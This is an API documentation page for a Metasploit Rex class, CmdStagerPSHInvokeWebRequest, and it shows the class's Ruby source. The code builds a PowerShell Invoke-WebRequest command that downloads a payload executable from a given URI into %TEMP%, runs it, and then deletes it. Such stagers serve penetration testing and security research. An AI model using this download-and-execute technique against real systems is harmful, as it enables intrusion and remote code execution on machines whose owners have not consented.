Class: Rex::Exploitation::CmdStagerPSHInvokeWebRequest

Inherits:

CmdStagerBase

Object
CmdStagerBase
Rex::Exploitation::CmdStagerPSHInvokeWebRequest

show all

Defined in:: lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb

Instance Method Summary collapse

Methods inherited from CmdStagerBase

#compress_commands, #encode_payload, #generate_cmds, #initialize, #parts_to_commands, #setup, #slice_up_payload, #teardown

Constructor Details

This class inherits a constructor from Rex::Exploitation::CmdStagerBase

Instance Method Details

#cmd_concat_operator ⇒ `Object`



42
43
44

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 42

def cmd_concat_operator
  ' & '
end

#generate(opts = {}) ⇒ `Object`

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 13

def generate(opts = {})
  if opts[:payload_uri].nil?
    raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
  end

  opts[:temp] ||= '%TEMP%'
  opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
  @payload_path = "#{opts[:temp]}\\#{opts[:file]}"

  super
end

#generate_cmds_decoder(opts) ⇒ `Object`

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 33

def generate_cmds_decoder(opts)
  cmds = []

  cmds << @payload_path
  cmds << "del #{@payload_path}" unless opts[:nodelete]

  cmds
end

#generate_cmds_payload(opts) ⇒ `Object`

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 25

def generate_cmds_payload(opts)
  # NOTE: This requires PowerShell >= 3.0
  cmd = "Invoke-WebRequest -OutFile #{@payload_path} #{opts[:payload_uri]}"

  # TODO: Craft a better command line, probably with encoding
  ["powershell.exe -c #{cmd}"]
end

#http? ⇒ `Boolean`

Returns:

(Boolean)



5
6
7

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 5

def http?
  true
end

#user_agent ⇒ `Object`



9
10
11

# File 'lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb', line 9

def user_agent
  /WindowsPowerShell/
end

Class: Rex::Exploitation::CmdStagerPSHInvokeWebRequest

Instance Method Summary collapse

Methods inherited from CmdStagerBase

Constructor Details

Instance Method Details

#cmd_concat_operator ⇒ Object

#generate(opts = {}) ⇒ Object

#generate_cmds_decoder(opts) ⇒ Object

#generate_cmds_payload(opts) ⇒ Object

#http? ⇒ Boolean

#user_agent ⇒ Object

#cmd_concat_operator ⇒ `Object`

#generate(opts = {}) ⇒ `Object`

#generate_cmds_decoder(opts) ⇒ `Object`

#generate_cmds_payload(opts) ⇒ `Object`

#http? ⇒ `Boolean`

#user_agent ⇒ `Object`